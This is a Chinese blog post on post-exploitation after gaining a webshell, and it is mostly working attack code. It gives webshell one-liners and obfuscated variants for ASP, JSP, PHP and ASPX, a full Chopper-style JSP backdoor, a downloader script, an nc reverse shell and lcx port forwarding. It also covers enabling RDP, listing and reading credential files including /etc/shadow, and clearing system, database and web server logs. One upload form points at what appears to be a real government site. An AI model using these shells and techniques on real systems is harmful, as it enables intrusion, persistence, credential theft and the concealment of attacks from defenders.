拿下webshell之后小朋友们应该怎么做

最新推荐文章于 2025-02-06 15:02:41 发布
原创 最新推荐文章于 2025-02-06 15:02:41 发布 · 8.8k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了WebShell的各种操作,包括ASP、JSP、PHP和ASPX的一句话后门、文件操作、命令执行等。同时,讨论了如何突破内网,如端口转发、反弹连接和信息收集。最后,提到了痕迹清理,涉及Windows和Linux的日志清除策略。

维持访问

WebShell

一般大马在管理员发现后后会被删除,上传一些隐蔽的一句话,或者功能简单的脚本。
如果有旁站的话,插入WebShell到旁站。一句话可以插入到某些重要文件中。
插入的时候最好加上判断,可防止报错
<?php if(isset($_POST['1'])){eval($_POST['1']);}?>

ASP

后缀名
ashx asp aspx ascx asmx
绕过检测的方式
如果wscript.xxxxxx不能使用,可以使用classID调用,这里classID各个版本各有不同
<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>
一句话
一般一句话
<%eval request("MH")%>
<%eval request(chr(35))%>
<%IfRequest("1")<>""ThenExecuteGlobal(Request("1"))%>
编码一句话,不过还是没有去掉eval
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>

利用<%%>和<script language=javascript runat=server></script>基本等价的道理,来去掉百分号。

使用VBS编码

<script language=vbs runat=server> 
Execute(HextoStr("65786563757465287265717565737428636872283335292929")) 
Function HextoStr(data) 
	HextoStr="EXECUTE """"" 
	C="&CHR(&H" 
	N=")" 
	Do While Len(data)>1 
		If IsNumeric(Left(data,1)) Then 
			HextoStr=HextoStr&C&Left(data,2)&N 
			data=Mid(data,3) 
		Else 
			HextoStr=HextoStr&C&Left(data,4)&N 
			data=Mid(data,5) 
		End If 
	Loop 
End Function 
</script>
使用JS编码 

<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode( 
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt>

使用ScriptControl,这个没有仔细测试 

<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
%>

url中输入

http://localhost/tmp.asp?
SubCode=sub e(Server,Response,Request,Application,Session,Error) eval(request("v")) end sub&v=response.write(server.mappath("tmp.asp"))
或者菜刀配置中写入
<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>


遍历目录
<%@ Language=vbscript %> 
<% 
'遍历目录以及目录下文件的函数 
%> 
<% 
Function Bianli(path,Recursion) 
	Set Fso=server.createobject("scripting.filesystemobject") 
	On Error Resume Next 
	Set Objfolder=fso.getfolder(path) 
	Set Objsubfolders=Objfolder.subfolders 
	Set Objfile = Objfolder.Files
	
	Response.write path
	For Each file in Objfile
		Response.write "<br>---" 
		Response.write file.name
	Next	
	
	For Each Objsubfolder In Objsubfolders
		Response.write "<p>" 
		if Recursion<>0 then
			call Bianli(path+"\"+Objsubfolder.name,Recursion) '递归 
		end if
	Next 
	Set Objfolder=nothing 
	Set Objsubfolders=nothing 
	Set Fso=nothing 
End Function 
%> 
<% 
dim path,Recursion
path = request("path")
Recursion = request("Recursion")
call Bianli(path,Recursion) '遍历d:盘 
%> 
<html>
<p>Testing...</p>
</html>

下载文件
<%@ language=vbscript codepage=65001%> 
  
  <% 
  'Filename must be input 
  if Request("Filename")="" then 
  response.write "<h1>Error:</h1>Filename is empty!<p>" 
  else 
  call downloadFile(Request("Filename")) 
  
  Function downloadFile(strFile) 
  ' make sure you are on the latest MDAC version for this to work 
  ' get full path of specified file 
  'strFilename = server.MapPath(strFile) 
  
  strFilename = strFile
  
  ' clear the buffer 
  Response.Buffer = True 
  Response.Clear 
  
  ' create stream 
  Set s = Server.CreateObject("ADODB.Stream") 
  s.Open 
  
  ' Set as binary 
  s.Type = 1 
  
  ' load in the file 
  on error resume next 
  
  ' check the file exists 
  Set fso = Server.CreateObject("Scripting.FileSystemObject") 
  if not fso.FileExists(strFilename) then 
  Response.Write("<h1>Error:</h1>"&strFilename&" does not exists!<p>") 
  Response.End 
  end if 
  
  ' get length of file 
  Set f = fso.GetFile(strFilename) 
  intFilelength = f.size 
  
  s.LoadFromFile(strFilename) 
  if err then 
  Response.Write("<h1>Error: </h1>Unknown Error!<p>") 
  Response.End 
  end if 
  
  ' send the headers to the users Browse 
  Response.AddHeader "Content-Disposition","attachment; filename="&f.name 
  Response.AddHeader "Content-Length",intFilelength 
  Response.CharSet = "UTF-8" 
  Response.ContentType = "application/octet-stream" 
  
  ' output the file to the browser 
  Response.BinaryWrite s.Read 
  Response.Flush 
  
  ' tidy up 
  s.Close 
  Set s = Nothing 
  
  End Function 
  end if 
  %>
执行命令
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

自己上传cmd的话这样写

<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c "&request("c")).stdout.readall%>

删除文件
<%
filepath=request("path")
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile(filepath)
Set fso = nothing
%>
重命名文件
<%
Set fso = Server.CreateObject("Scripting.FileSystemObject") 
Set f = fso.GetFile(request("path"))
f.name =request("filename")
newname=f.name
response.write "已更名为"&newname
%>
移动文件
<%
dim fso 
set fso = server.createobject("scripting.filesystemobject") 
fso.movefolder request("name1"),request("name2") 
set fso = nothing  
%>
复制文件
<%
dim MyFSO
set MyFSO=Server.CreateObject("Scripting.FileSystemObject")
MyFSO.CopyFile request("name1"),request("name2")
set MyFSO=nothing
%>
上传文件Scripting.FileSystemObject
<form name="FORM" action="upload.asp" method="post"> 
 <input type=TEXT name=file style="width:300px;height:100px"> 
  <input type=TEXT name=name size=20 maxlength=100> 
  <input type="submit" name="submit" value="OK">  
</form> 
<% 
dim fs, f 
set fs=Server.CreateObject("Scripting.FileSystemObject")  
set f=fs.CreateTextFile(Request("name"),true)
f.Write(Request("file"))
f.Close
set f=nothing
set fs=nothing
Response.write Request("name")
%>
上传文件ADODB.Stream
<form name="FORM" action="test.asp" method="post"> 
 <input type=TEXT name=file style="width:300px;height:100px"> 
  <input type=TEXT name=name size=20 maxlength=100> 
  <input type="submit" name="submit" value="OK">  
</form> 
<% 
dim oFileStream 
Set oFileStream = Server.CreateObject("ADODB.Stream") 
oFileStream.Type = 2   'adTypeText  =2
oFileStream.Mode = 3   'adModeReadWrite =3
oFileStream.open
oFileStream.WriteText Request("file")
oFileStream.SaveToFile Request("name"),2 'adSaveCreateOverWrite =2
set oFileStream=nothing
Response.write Request("name")
%>



JSP

绕过检测的方式
一句话
这个JSP的一句话比较恐怖
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!String Pwd = "chopper";

	String EC(String s, String c) throws Exception {
		return s;
	}//new String(s.getBytes("ISO-8859-1"),c);}

	Connection GC(String s) throws Exception {
		String[] x = s.trim().split("\r\n");
		Class.forName(x[0].trim()).newInstance();
		Connection c = DriverManager.getConnection(x[1].trim());
		if (x.length > 2) {
			c.setCatalog(x[2].trim());
		}
		return c;
	}

	void AA(StringBuffer sb) throws Exception {
		File r[] = File.listRoots();
		for (int i = 0; i < r.length; i++) {
			sb.append(r[i].toString().substring(0, 2));
		}
	}

	void BB(String s, StringBuffer sb) throws Exception {
		File oF = new File(s), l[] = oF.listFiles();
		String sT, sQ, sF = "";
		java.util.Date dt;
		SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
		for (int i = 0; i < l.length; i++) {
			dt = new java.util.Date(l[i].lastModified());
			sT = fm.format(dt);
			sQ = l[i].canRead() ? "R" : "";
			sQ += l[i].canWrite() ? " W" : "";
			if (l[i].isDirectory()) {
				sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
						+ "\t" + sQ + "\n");
			} else {
				sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
						+ sQ + "\n";
			}
		}
		sb.append(sF);
	}

	void EE(String s) throws Exception {
		File f = new File(s);
		if (f.isDirectory()) {
			File x[] = f.listFiles();
			for (int k = 0; k < x.length; k++) {
				if (!x[k].delete()) {
					EE(x[k].getPath());
				}
			}
		}
		f.delete();
	}

	void FF(String s, HttpServletResponse r) throws Exception {
		int n;
		byte[] b = new byte[512];
		r.reset();
		ServletOutputStream os = r.getOutputStream();
		BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
		os.write(("->" + "|").getBytes(), 0, 3);
		while ((n = is.read(b, 0, 512)) != -1) {
			os.write(b, 0, n);
		}
		os.write(("|" + "<-").getBytes(), 0, 3);
		os.close();
		is.close();
	}

	void GG(String s, String d) throws Exception {
		String h = "0123456789ABCDEF";
		int n;
		File f = new File(s);
		f.createNewFile();
		FileOutputStream os = new FileOutputStream(f);
		for (int i = 0; i < d.length(); i += 2) {
			os
					.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d
							.charAt(i + 1))));
		}
		os.close();
	}

	void HH(String s, String d) throws Exception {
		File sf = new File(s), df = new File(d);
		if (sf.isDirectory()) {
			if (!df.exists()) {
				df.mkdir();
			}
			File z[] = sf.listFiles();
			for (int j = 0; j < z.length; j++) {
				HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
			}
		} else {
			FileInputStream is = new FileInputStream(sf);
			FileOutputStream os = new FileOutputStream(df);
			int n;
			byte[] b = new byte[512];
			while ((n = is.read(b, 0, 512)) != -1) {
				os.write(b, 0, n);
			}
			is.close();
			os.close();
		}
	}

	void II(String s, String d) throws Exception {
		File sf = new File(s), df = new File(d);
		sf.renameTo(df);
	}

	void JJ(String s) throws Exception {
		File f = new File(s);
		f.mkdir();
	}

	void KK(String s, String t) throws Exception {
		File f = new File(s);
		SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
		java.util.Date dt = fm.parse(t);
		f.setLastModified(dt.getTime());
	}

	void LL(String s, String d) throws Exception {
		URL u = new URL(s);
		int n;
		FileOutputStream os = new FileOutputStream(d);
		HttpURLConnection h = (HttpURLConnection) u.openConnection();
		InputStream is = h.getInputStream();
		byte[] b = new byte[512];
		while ((n = is.read(b, 0, 512)) != -1) {
			os.write(b, 0, n);
		}
		os.close();
		is.close();
		h.disconnect();
	}

	void MM(InputStream is, StringBuffer sb) throws Exception {
		String l;
		BufferedReader br = new BufferedReader(new InputStreamReader(is));
		while ((l = br.readLine()) != null) {
			sb.append(l + "\r\n");
		}
	}

	void NN(String s, StringBuffer sb) throws Exception {
		Connection c = GC(s);
		ResultSet r = c.getMetaData().getCatalogs();
		while (r.next()) {
			sb.append(r.getString(1) + "\t");
		}
		r.close();
		c.close();
	}

	void OO(String s, StringBuffer sb) throws Exception {
		Connection c = GC(s);
		String[] t = { "TABLE" };
		ResultSet r = c.getMetaData().getTables(null, null, "%", t);
		while (r.next()) {
			sb.append(r.getString("TABLE_NAME") + "\t");
		}
		r.close();
		c.close();
	}

	void PP(String s, StringBuffer sb) throws Exception {
		String[] x = s.trim().split("\r\n");
		Connection c = GC(s);
		Statement m = c.createStatement(1005, 1007);
		ResultSet r = m.executeQuery("select * from " + x[3]);
		ResultSetMetaData d = r.getMetaData();
		for (int i = 1; i <= d.getColumnCount(); i++) {
			sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)
					+ ")\t");
		}
		r.close();
		m.close();
		c.close();
	}

	void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
		int i;
		Connection c = GC(s);
		Statement m = c.createStatement(1005, 1008);
		try {
			ResultSet r = m.executeQuery(q);
			ResultSetMetaData d = r.getMetaData();
			int n = d.getColumnCount();
			for (i = 1; i <= n; i++) {
				sb.append(d.getColumnName(i) + "\t|\t");
			}
			sb.append("\r\n");
			while (r.next()) {
				for (i = 1; i <= n; i++) {
					sb.append(EC(r.getString(i), cs) + "\t|\t");
				}
				sb.append("\r\n");
			}
			r.close();
		} catch (Exception e) {
			sb.append("Result\t|\t\r\n");
			try {
				m.executeUpdate(q);
				sb.append("Execute Successfully!\t|\t\r\n");
			} catch (Exception ee) {
				sb.append(ee.toString() + "\t|\t\r\n");
			}
		}
		m.close();
		c.close();
	}%>
	
	
<%
	String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + "";
	request.setCharacterEncoding(cs);
	response.setContentType("text/html;charset=" + cs);
	String Z = EC(request.getParameter(Pwd) + "", cs);
	String z1 = EC(request.getParameter("z1") + "", cs);
	String z2 = EC(request.getParameter("z2") + "", cs);
	StringBuffer sb = new StringBuffer("");
	try {
		sb.append("->" + "|");
		if (Z.equals("A")) {
			String s = new File(application.getRealPath(request
					.getRequestURI())).getParent();
			sb.append(s + "\t");
			if (!s.substring(0, 1).equals("/")) {
				AA(sb);
			}
		} else if (Z.equals("B")) {
			BB(z1, sb);
		} else if (Z.equals("C")) {
			String l = "";
			BufferedReader br = new BufferedReader(
					new InputStreamReader(new FileInputStream(new File(
							z1))));
			while ((l = br.readLine()) != null) {
				sb.append(l + "\r\n");
			}
			br.close();
		} else if (Z.equals("D")) {
			BufferedWriter bw = new BufferedWriter(
					new OutputStreamWriter(new FileOutputStream(
							new File(z1))));
			bw.write(z2);
			bw.close();
			sb.append("1");
		} else if (Z.equals("E")) {
			EE(z1);
			sb.append("1");
		} else if (Z.equals("F")) {
			FF(z1, response);
		} else if (Z.equals("G")) {
			GG(z1, z2);
			sb.append("1");
		} else if (Z.equals("H")) {
			HH(z1, z2);
			sb.append("1");
		} else if (Z.equals("I")) {
			II(z1, z2);
			sb.append("1");
		} else if (Z.equals("J")) {
			JJ(z1);
			sb.append("1");
		} else if (Z.equals("K")) {
			KK(z1, z2);
			sb.append("1");
		} else if (Z.equals("L")) {
			LL(z1, z2);
			sb.append("1");
		} else if (Z.equals("M")) {
			String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
			Process p = Runtime.getRuntime().exec(c);
			MM(p.getInputStream(), sb);
			MM(p.getErrorStream(), sb);
		} else if (Z.equals("N")) {
			NN(z1, sb);
		} else if (Z.equals("O")) {
			OO(z1, sb);
		} else if (Z.equals("P")) {
			PP(z1, sb);
		} else if (Z.equals("Q")) {
			QQ(cs, z1, z2, sb);
		}
	} catch (Exception e) {
		sb.append("ERROR" + ":// " + e.toString());
	}
	sb.append("|" + "<-");
	out.print(sb.toString());
%>
遍历目录
<%
	String path;
	 path = request.getParameter("path");
     java.io.File file = new java.io.File(path);
     String [] s;
     if(file.isDirectory()){
          s = file.list();
          for(int i=0;i<s.length;i++)
           out.println(s[i]+"<br>");
	}
%>
读取文件
<%
	java.lang.String strFileName; 
	java.io.File objFile; 
	java.io.FileReader objFileReader; 
	char[] chrBuffer = new char[100]; 
	int intLength; 
	strFileName = request.getParameter("file"); 
	objFile = new java.io.File(strFileName);
	
	if(objFile.exists()){
		objFileReader = new java.io.FileReader(objFile); 
		while((intLength=objFileReader.read(chrBuffer))!=-1)
			out.write(chrBuffer,0,intLength);
		objFileReader.close(); 
	} 
%>

执行命令
<html> 
<% 
	Process p=Runtime.getRuntime().exec("cmd /c "+request.getParameter("cmd")); 
	java.io.BufferedReader br=new java.io.BufferedReader(new java.io.InputStreamReader(p.getInputStream())); 
	
	String strline=""; 
	StringBuffer result=new StringBuffer(""); 
	while((strline=br.readLine())!=null) 
	{ 
		result.append(strline+"\r\n");   
	}     
%> 

<% 
if(result!=null && result.toString().trim().equals("")==false) 
{ 
%> 
<textarea name="hack" rows="20" cols="70"><%=result.toString()%></textarea> 
<% 
} 
%> 
</html>

上传文件
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
上传的本地页面
<form action="http://cgs.ytjj.gov.cn/ytcgs/dy.jsp?f=lanlan4.js" method="post">
<textarea name=t cols=120 rows=10 width=45>JSP大马代码</textarea><BR><center><br>
<input type=submit value="提交">
</form>

PHP

后缀名
php/php3/php4/php5/pht/phtml
一句话
普通一句话
<?php eval($_POST[sb])?>
<?php assert($_POST[sb]);?>
容错一句话,@是容错符,这里注意一点,使用assert的时候最好使用@,不然会爆一个Warning
<?php @assert($_POST[sb])?>
变量名做函数一句话
编码后的一句话,这是使用php变量可以做函数名这个特性,eval是不可变函数,不过assert可以
简单的形式
<?php 
$a="assert";
$a($_POST[sb]);
?>
复杂的形式,大括号括起来代表变量的意思,里面的1-2-5做了运算其实是-6
<?php
@$_="s"."s"."e"."r";
@$_="a".$_."t";
@$_(${"_P"."OS"."T"}[1-2-5]);?>
这里就会有各种自由发挥了,大胆发挥想象力各种各样的shell就出现了
比如这种
<?php $aaaaa="sewtemznypianol";$bbbbb=$aaaaa{0}.$aaaaa{8}.$aaaaa{0}.$aaaaa{3}.$aaaaa{1}.$aaaaa{5}; $aaaaaa="edoced46esab_n"; $bbbbbb=$aaaaaa{11}.$aaaaaa{10}.$aaaaaa{9}.$aaaaaa{8}.$aaaaaa{7}.$aaaaaa{6}.$aaaaaa{12}.$aaaaaa{5}.$aaaaaa{4}.$aaaaaa{3}.$aaaaaa{2}.$aaaaaa{1}.$aaaaaa{0};echo $bbbbb($bbbbbb("aXBjb25maWc="));?>
另一种变形,不过这个菜刀连接的话需要在配置中写入a=assert
<?php
@$_GET['a']($_GET['b']);
?>
































不使用<?的一句话
<script language="php">@eval($_POST[sb])</script>




使用可执行函数的函数的一句话


php中有一些函数可以吧一个自定义函数当做回调函数比如array_map()


把函数名当做字符串参数传递的时候,自然就可以随意编码


<?php array_map("ass\x65rt",(array)$_REQUEST['1']);?>


文件包含伪装一句话


首先可以使用文件包含对一句话进行伪装




eval(file_get_contents('php://input'));




也利用了apche服务器的错误日志文件,当访问一个不存在的连接时,日志中会记录下这样的一句话。




[Thu Aug 08 08:47:43 2013] [error] [client 127.0.0.1] File does not exist: C:/wamp/www/test/12345




先在文件中插入




 include($_GET['f']);
然后使用一句话当做地址访问页面,让浏览器在log中保存一句话,注意这里浏览器会自动将一句话进行编码再提交,这样的话时不能执行的





http://127.0.0.1/test/<?php eval($_POST[sb])?>


使用curl来达成访问


<?php
	// 1. 初始化
	$ch = curl_init();
	// 2. 设置选项,包括URL
	curl_setopt($ch, CURLOPT_URL, "http://127.0.0.1/test/<?php eval(\$_POST[sb])?>");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/4");
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION,true);
	// 3. 执行并获取HTML文档内容
	$output = curl_exec($ch);
	// 4. 释放curl句柄
	curl_close($ch);
?>







之后吧log的地址当做参数传入即可,这里log位置须自行查找。



http://127.0.0.1/test/123.php?f=C:\wamp\logs\apache_error.log
这样会吧log文件全部包含并显示,比较明显,如果文件比较大会很慢。


而且如果第一次插入的PHP语句有错,那么后面再插入的便都不能执行了。




极度变态的一句话


有一些走极端的外国人,非要弄不包含字母和数字写shell极度自虐。


主要技术就是php中array被强转成string的时候会变成“array”,




$_[1 + ""] = "";
$_ = $_."";
var_dump($_);
字符之间可以进行位运算。





echo 'a'|'b';//c!




+""会被解析成0,猜测是php遇到加号会把结果转成int型,undefine value会被解析成0




echo +""; //0
echo 1+"";//1
echo ++$xxx //1 xxx undefine
$_="abc";
echo ++$_;  //abd



这样这位外国大神就得到了一个没有字符的shell



<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"0x06").($_[+""]|"0x05").($_[+""]^"0x15");   //get
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>


经过另一位大神的改进去掉了数字


<?php $_[]++;$_[]=$_._;$_=$_[$_[+_]];$_=$__=$___=$____=$_____=$______=$_[+_]; $_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; $___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++; $____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++; $_____++;$_____++;$_____++;$_____++; $______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++; $_=$_.$__.$___.$____.$_____.$______;$_("ipconfig"); ?>
上面的太复杂?这是概念版


$_[]++;   
$_[]=$_._; 
$_=$_[$_[+_]]; 
$_=$_[+_];    //使用数组提取字符串 
$_++;        //偏移 1 得B,如果不用这句就是A 
$_("123");  //将$_ 作为函数使用




命令执行


php能执行命令的函数有不少,在 安全模式下,只有在特定目录中的外部程序才可以被执行,对其它程序的调用将被拒绝。这个目录可以在php.ini文件中用 safe_mode_exec_dir指令







system() 


可以直接输出命令执行结果




<?php
system("dir"); 
?>



exec()




只返回命令的最后一行,可以重载两个函数分别是结果和执行状态。


<?php 
echo exec("dir"); 
exec("dir", $res);
var_dump($res);
exec("dir", $res, $rc);
var_dump($rc);
?> 





passthru() 




和system差不多的用法,直接输出




<?php 
passthru("dir");
?> 



popen()


这个函数可以可以建立一个可以互交的命令,把命令当做一个文件句柄打开,往里面读写


<?php 
/* PHP中如何增加一个系统用户 
下面是一段例程,增加一个名字为james的用户, 
root密码是 verygood。仅供参考 
*/ 
$sucommand = "su --login root --command"; 
$useradd = "useradd "; 
$rootpasswd = "verygood"; 
$user = "james"; 
$user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user); 
$fp = @popen($user_add,"w"); 
@fputs($fp,$rootpasswd); 
@pclose($fp); 
?> 



点号执行命令大法




波浪线下面那个键括起来的字符串可以当命令执行。




<?php 
$cmd = `dir`;
echo $cmd; 
?> 









ASPX


一句话


普通一句话


<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>







编码一句话,此方法可能不靠谱







<%@ Page Language = Jscript %>

<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/

"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+

"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+

","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval

(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>







上传文件


<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>







后门


下载者


JS脚本写的下载者,需要执行命令的权限


//cscript down.js  http://127.0.0.1/1.exe  c:/1.exe 
var objArgs = WScript.Arguments; 
var sGet=new ActiveXObject("ADODB.Stream"); 
var xGet = false; 
try { 
	xGet = new XMLHttpRequest(); 
}  
catch (trymicrosoft) { 
	try { 
		xGet = new ActiveXObject("Msxml2.XMLHTTP"); 
	}  
	catch (othermicrosoft) { 
		try { 
		  xGet = new ActiveXObject("Microsoft.XMLHTTP"); 
		}  
		catch (failed) { 
		  xGet = false; 
		} 
	} 
} 

xGet.Open ("GET",objArgs(0).toLowerCase(),0); 
xGet.Send(); 
sGet.Mode=3; 
sGet.Type=1; 
sGet.Open(); 
sGet.Write (xGet.ResponseBody); 
sGet.SaveToFile (objArgs(1).toLowerCase(),2); 



VPN














SSH







突破内网


端口转发与反弹连接




这里还有各种环境下的方法,非常牛逼


http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet




Windows LCX端口转发


windows下的端口转发比较简单,只需要lcx就可以了。







[+] [=====examples=====]
[*] lcx.exe -listen 6666 7777
[*] lcx.exe -l 6666 7777
[*] lcx.exe -slave 221.223.41.1 6666 127.0.0.1 3389
[*] lcx.exe -s 221.223.41.1 6666 127.0.0.1 3389



Linux反弹连接




Linux下有自带的NC,可是做了功能的阉割没有 -e的选项


不能直接使用


nc -l -vv -p 2222 -e /bin/bash
不过可以这样利用


root@bt:~#mknod /tmp/backpipe p
root@bt:~#/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe
mknod只有在root权限下才可以使用,如果权限不够的话可以换成


mkfifo /tmp/backpipe





Linux端口映射


使用SSH应该可以,不过没有仔细研究


http://improve.iteye.com/blog/1413884
http://www.2cto.com/Article/201201/117834.html










收集信息与开启服务


Windows


开启服务


3389


sc config termservice start= auto 
net start termservice
允许3389外连


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f 
修改3389端口


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f


系统信息


查看系统版本信息


ver


查看系统详细信息,包括补丁版本


systeminfo



查看账户登录情况


quser







敏感目录






c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini     
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码







Linux







开启服务


判断SSH


/etc/init.d/sshd status









版本信息


查看内核版本


cat /proc/version
uname -r
uname -a


查看系统版本


lsb_release -a
cat /etc/issue
cat /etc/redhat-release
rpm -q redhat-release 
file /bin/bash
file /bin/cat 









管理员密码


获取管理员HasH


cat /etc/shadow


痕迹清理


Windows


日志和警报


开始 – 程序 – 管理工具 – 计算机管理 – 系统工具-事件查看器




开始 – 程序 – 管理工具 – 计算机管理 – 系统工具-性能日志和警报




文件日志


清除这些日志时,要停掉相应的服务,要不然会出现文件在被另一个程序使用的情况。


比如


net stop "task scheduler"


不过守护安全日志和系统日志的服务是停不掉的,我们可以通过计算机管理-连接一台远程计算机来删除它们


net stop eventlog


安全日志文件


%systemroot%\system32\config\SecEvent.EVT
系统日志文件


%systemroot%\system32\config\SysEvent.EVT
应用程序日志文件


%systemroot%\system32\config\AppEvent.EVT
Internet信息服务FTP日志默认位置,默认每天一个日志


%systemroot%\system32\logfiles\msftpsvc1\
Internet信息服务WWW日志默认位置,默认每天一个日志


%systemroot%\system32\logfiles\w3svc1\
Scheduler服务日志默认位置


%sys temroot%\schedlgu.txt





注册表日志


日志存放的目录,可以手动修改,路径存放于注册表中。


HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent


防火墙软件日志


这个见仁见智,逮住一通猛删就好。


MSSQL日志


这样可以查到数据库文件以及其备份文件存放的地方


select * from master..sysdatabases;
每个数据库都有一个同名LDF文件,查看方法是这样,可查看到数据库具体操作的记录


dbcc log (DATABASE,n)   --n = (0,1,2,3,4)
1 - 更多信息plus flags, tags, row length 

2 - 非常详细的信息plus object name, index name,page id, slot id 


3 - 每种操作的全部信息 

4 - 每种操作的全部信息加上该事务的16进制信息






删除这个LDF方法,就是把这个数据库分离,然后删除LDF文件,再附加回来就好了。


有风险,慎用。


MySQL日志


Mysql的Log文件是以二进制方式存储的,不能直接打开。查看需借助mysqlbinlog这个工具。


删除的话很简单的执行一下,即可


Mysql>reset master;





Apache日志


Apache的日志分为两种,访问日志和错误日志,分别叫做access.log error.log


存放位置不固定,路径定义在httpd.conf文件里,其中可以设置记录的等级


ErrorLog ../logs/apache_error.log


httpd.conf文件一般在,这两个地方




/etctpd/conftpd.conf
C:\wamp\Apache2\conftpd.conf




Linux


history


http://linux.chinaunix.net/techdoc/net/2007/05/26/958765.shtml
其他


